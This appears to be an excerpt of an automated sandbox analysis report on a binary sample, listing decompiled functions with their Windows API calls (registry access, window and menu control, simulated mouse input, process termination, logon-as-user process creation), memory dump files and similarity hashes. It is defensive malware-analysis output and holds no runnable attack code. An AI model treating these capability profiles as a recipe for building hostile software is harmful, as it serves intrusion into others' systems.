                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                              • Part of subcall function 003E0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003DFDAD,?,?), ref: 003E0E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E02BD
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003E02FD
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 003E0320
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003E0349
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003E038C
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 003E0399
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                            • String ID:
                                                            • API String ID: 4046560759-0
                                                            • Opcode ID: e89d1a395baba842315c3790dd4ecd0815e5d438452cc580a25eafc038c2d393
                                                            • Instruction ID: f43f1b7c2a427046508181bb61a77da8260fedc16622e610fc9158961c8ceb92
                                                            • Opcode Fuzzy Hash: e89d1a395baba842315c3790dd4ecd0815e5d438452cc580a25eafc038c2d393
                                                            • Instruction Fuzzy Hash: 68516A311082409FC716EF64C885E6FBBE8FF84314F448A2DF5858B2A2DB71E945CB52
                                                            Function 003E5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenu.USER32(?), ref: 003E57FB
                                                            • GetMenuItemCount.USER32(00000000), ref: 003E5832
                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003E585A
                                                            • GetMenuItemID.USER32(?,?), ref: 003E58C9
                                                            • GetSubMenu.USER32(?,?), ref: 003E58D7
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 003E5928
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountMessagePostString
                                                            • String ID:
                                                            • API String ID: 650687236-0
                                                            • Opcode ID: 9d0f72a76fbfa964af81dac3697dec50da0faf5f112233977a733081960cafcc
                                                            • Instruction ID: 376637d308939df76eff2d45445ad3ec6e736ae1a0584d38fe2fc9918a531308
                                                            • Opcode Fuzzy Hash: 9d0f72a76fbfa964af81dac3697dec50da0faf5f112233977a733081960cafcc
                                                            • Instruction Fuzzy Hash: CB516035E00665EFCF16EF65C885AAEB7B8EF48314F114169E815BB391CB70AE41CB90
                                                            Function 003BEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 003BEF06
                                                            • VariantClear.OLEAUT32(00000013), ref: 003BEF78
                                                            • VariantClear.OLEAUT32(00000000), ref: 003BEFD3
                                                            • _memmove.LIBCMT ref: 003BEFFD
                                                            • VariantClear.OLEAUT32(?), ref: 003BF04A
                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 003BF078
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                            • String ID:
                                                            • API String ID: 1101466143-0
                                                            • Opcode ID: 329dbd5deb07ed2b958d0100f8b80dac71aa2c71eec8f3ed39e75a9e67e90a4a
                                                            • Instruction ID: fe1457a67525b357c3e8dd48b46b6a4490dfdc1e769b777f534c4291820ceb33
                                                            • Opcode Fuzzy Hash: 329dbd5deb07ed2b958d0100f8b80dac71aa2c71eec8f3ed39e75a9e67e90a4a
                                                            • Instruction Fuzzy Hash: 4C5169B5A00209EFCB15DF58C880AAAB7B8FF4C314F158569EA59DB351E734E911CFA0
                                                            Function 003C220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 003C2258
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C22A3
                                                            • IsMenu.USER32(00000000), ref: 003C22C3
                                                            • CreatePopupMenu.USER32 ref: 003C22F7
                                                            • GetMenuItemCount.USER32(000000FF), ref: 003C2355
                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 003C2386
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                            • String ID:
                                                            • API String ID: 3311875123-0
                                                            • Opcode ID: 3da28aaeb3da9240eb76496d22ceddc57c4d0b93888eaf29321615804d4e6611
                                                            • Instruction ID: 633833ce3c366303f943b26b4b28d27779f17fd286865f0e4855e4f95eb07f53
                                                            • Opcode Fuzzy Hash: 3da28aaeb3da9240eb76496d22ceddc57c4d0b93888eaf29321615804d4e6611
                                                            • Instruction Fuzzy Hash: F2518938600289DFDF22DF68C988FAEBBE9AF45314F15422DE851EB290D3B49D04CB51
                                                            Function 00361765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 0036179A
                                                            • GetWindowRect.USER32(?,?), ref: 003617FE
                                                            • ScreenToClient.USER32(?,?), ref: 0036181B
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0036182C
                                                            • EndPaint.USER32(?,?), ref: 00361876
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                            • String ID:
                                                            • API String ID: 1827037458-0
                                                            • Opcode ID: 54c5512ea323c71233c823316bfced374e2a8b8f7b5004893842d45bc1ed0f29
                                                            • Instruction ID: f13bf356fc92b306ac1ec25446765a32ebef41057564b61109611ed93340306e
                                                            • Opcode Fuzzy Hash: 54c5512ea323c71233c823316bfced374e2a8b8f7b5004893842d45bc1ed0f29
                                                            • Instruction Fuzzy Hash: 7841B2302047409FDB22DF25DCC4FB67BE8FB4A724F188669F5958B2A1C7B09845DB61
                                                            Function 003EB69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(004257B0,00000000,01645CF8,?,?,004257B0,?,003EB5A8,?,?), ref: 003EB712
                                                            • EnableWindow.USER32(00000000,00000000), ref: 003EB736
                                                            • ShowWindow.USER32(004257B0,00000000,01645CF8,?,?,004257B0,?,003EB5A8,?,?), ref: 003EB796
                                                            • ShowWindow.USER32(00000000,00000004,?,003EB5A8,?,?), ref: 003EB7A8
                                                            • EnableWindow.USER32(00000000,00000001), ref: 003EB7CC
                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 003EB7EF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Enable$MessageSend
                                                            • String ID:
                                                            • API String ID: 642888154-0
                                                            • Opcode ID: c6e35b6ae0b2d069b458a409a2137fb600dc492a1922b0c8683a6b4a2f74b9ed
                                                            • Instruction ID: b1698ae8da1bd7ec1eaa94a5c7bbe782f7ca85e48e75a106cbec804c8f3c9690
                                                            • Opcode Fuzzy Hash: c6e35b6ae0b2d069b458a409a2137fb600dc492a1922b0c8683a6b4a2f74b9ed
                                                            • Instruction Fuzzy Hash: CE417434600190EFDB23CF25C499B96BBE1FF45350F1942B9E9488FAE2C771A856CB51
                                                            Function 003D709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,003D4E41,?,?,00000000,00000001), ref: 003D70AC
                                                              • Part of subcall function 003D39A0: GetWindowRect.USER32(?,?), ref: 003D39B3
                                                            • GetDesktopWindow.USER32 ref: 003D70D6
                                                            • GetWindowRect.USER32(00000000), ref: 003D70DD
                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 003D710F
                                                              • Part of subcall function 003C5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C52BC
                                                            • GetCursorPos.USER32(?), ref: 003D713B
                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003D7199
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                            • String ID:
                                                            • API String ID: 4137160315-0
                                                            • Opcode ID: 0ab3bdb8a480ce39e258adfb2652791f0753abe95ab407b985e2a2f09e124e19
                                                            • Instruction ID: c8b6390cb8ae7e0cc9519bc97712139bd10db2aaad616d56205ee07021fe3318
                                                            • Opcode Fuzzy Hash: 0ab3bdb8a480ce39e258adfb2652791f0753abe95ab407b985e2a2f09e124e19
                                                            • Instruction Fuzzy Hash: A531D272509345AFD721DF14D849F9BB7EAFF88314F000A1AF5859B291DB70EA09CB92
                                                            Function 003B8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 003B80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003B80C0
                                                              • Part of subcall function 003B80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003B80CA
                                                              • Part of subcall function 003B80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003B80D9
                                                              • Part of subcall function 003B80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003B80E0
                                                              • Part of subcall function 003B80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003B80F6
                                                            • GetLengthSid.ADVAPI32(?,00000000,003B842F), ref: 003B88CA
                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003B88D6
                                                            • HeapAlloc.KERNEL32(00000000), ref: 003B88DD
                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 003B88F6
                                                            • GetProcessHeap.KERNEL32(00000000,00000000,003B842F), ref: 003B890A
                                                            • HeapFree.KERNEL32(00000000), ref: 003B8911
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                            • String ID:
                                                            • API String ID: 3008561057-0
                                                            • Opcode ID: 3c8d918262a95e11e5eca19e3aa7990a29b3885820f55ca451f903e554f24c40
                                                            • Instruction ID: c15c16592f19b227645741f9740745fe5dc1f7e9608f5a3861fb1e2a355cef91
                                                            • Opcode Fuzzy Hash: 3c8d918262a95e11e5eca19e3aa7990a29b3885820f55ca451f903e554f24c40
                                                            • Instruction Fuzzy Hash: 43119D71601209FFDF229BA4DC49BFE7BACEB45319F108128E945DB550CB729E04DB60
                                                            Function 003B85B0 Relevance: 9.1, APIs: 6, Instructions: 61processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003B85E2
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 003B85E9
                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003B85F8
                                                            • CloseHandle.KERNEL32(00000004), ref: 003B8603
                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003B8632
                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 003B8646
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                            • String ID:
                                                            • API String ID: 1413079979-0
                                                            • Opcode ID: 8c33b76b0f899e110edfd8e740d00be50bdfe1c5711db796e51fd4390bed5a9c
                                                            • Instruction ID: b2f48b198dd0c577223b71ba2e58231e82b4875b15cb0dcf4cd9add0beddf8f3
                                                            • Opcode Fuzzy Hash: 8c33b76b0f899e110edfd8e740d00be50bdfe1c5711db796e51fd4390bed5a9c
                                                            • Instruction Fuzzy Hash: FF113A72501149AFDF12CFA4DD88AEE7BADEF48348F054165FA05A61A0C7718E64EB20
                                                            Function 003BB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 003BB7B5
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 003BB7C6
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003BB7CD
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 003BB7D5
                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 003BB7EC
                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 003BB7FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 110cd338cedde17b8aa07cac410d8a830018badfe3c83cae0fc089fff9f78daf
                                                            • Instruction ID: 5a6c3af0f42d9ba041674d840e9cbb2675bf0f48277c5bcfa2c9db7ee0af54fc
                                                            • Opcode Fuzzy Hash: 110cd338cedde17b8aa07cac410d8a830018badfe3c83cae0fc089fff9f78daf
                                                            • Instruction Fuzzy Hash: 9C018875E00249FFEB115BA69C85A5EBFBCEF48311F004175FA04AB291DA719D00CF51
                                                            Function 00380162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00380193
                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 0038019B
                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003801A6
                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003801B1
                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 003801B9
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 003801C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: 7d9aee579bf85c9785d2a99fdb6754be86cc6ae6583e36400bf1829b534da787
                                                            • Instruction ID: be299c1bf68662e3222b418616f309ab265967ace5dca6e90feca8e1ff6e2c04
                                                            • Opcode Fuzzy Hash: 7d9aee579bf85c9785d2a99fdb6754be86cc6ae6583e36400bf1829b534da787
                                                            • Instruction Fuzzy Hash: A7016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C4B941C7F5A864CBE5
                                                            Function 003C53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003C53F9
                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003C540F
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 003C541E
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003C542D
                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003C5437
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003C543E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 839392675-0
                                                            • Opcode ID: d8969d4662ba8801b5d5db573662c42ab4dc84dfbbb9df1162af396cf14e9b12
                                                            • Instruction ID: d8f8a611580c1a6375e0c188c4f2ff88865d0be936c4f5ce4c5d10b6ff2b2c85
                                                            • Opcode Fuzzy Hash: d8969d4662ba8801b5d5db573662c42ab4dc84dfbbb9df1162af396cf14e9b12
                                                            • Instruction Fuzzy Hash: 0DF01D32241598BFE7325BA29C4EEAB7B7CEBC6B11F000269FA04D50D197E11A0186B5
                                                            Function 003C7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 003C7243
                                                            • EnterCriticalSection.KERNEL32(?,?,00370EE4,?,?), ref: 003C7254
                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,00370EE4,?,?), ref: 003C7261
                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00370EE4,?,?), ref: 003C726E
                                                              • Part of subcall function 003C6C35: CloseHandle.KERNEL32(00000000,?,003C727B,?,00370EE4,?,?), ref: 003C6C3F
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 003C7281
                                                            • LeaveCriticalSection.KERNEL32(?,?,00370EE4,?,?), ref: 003C7288
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3495660284-0
                                                            • Opcode ID: 5dcd690cfa5e0869155a159ffaca1f318c18183fec779dc06d93bf1932f7d4b9
                                                            • Instruction ID: 8bcc5ef57a53276aa1f82857bede745d1b0fd117c980d016d6526de025309ac2
                                                            • Opcode Fuzzy Hash: 5dcd690cfa5e0869155a159ffaca1f318c18183fec779dc06d93bf1932f7d4b9
                                                            • Instruction Fuzzy Hash: D3F03A3A540652AFD7231B64ED8CAEA773DEF45702F110A35F602990E0CBB65901CB50
                                                            Function 003B8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003B899D
                                                            • UnloadUserProfile.USERENV(?,?), ref: 003B89A9
                                                            • CloseHandle.KERNEL32(?), ref: 003B89B2
                                                            • CloseHandle.KERNEL32(?), ref: 003B89BA
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 003B89C3
                                                            • HeapFree.KERNEL32(00000000), ref: 003B89CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            • Opcode ID: be6537131d4d31244034727dde5c43d3c6da3037d99b1584062560295b422f8b
                                                            • Instruction ID: 77d57e52c63b2e6ac818ebc984d61c6fe9b62518031c46ac105a4f7155e0cf64
                                                            • Opcode Fuzzy Hash: be6537131d4d31244034727dde5c43d3c6da3037d99b1584062560295b422f8b
                                                            • Instruction Fuzzy Hash: AEE0C236004049FFDA121FE1EC4C91ABB6DFB89362B108330F219890F0CBB29460DB50
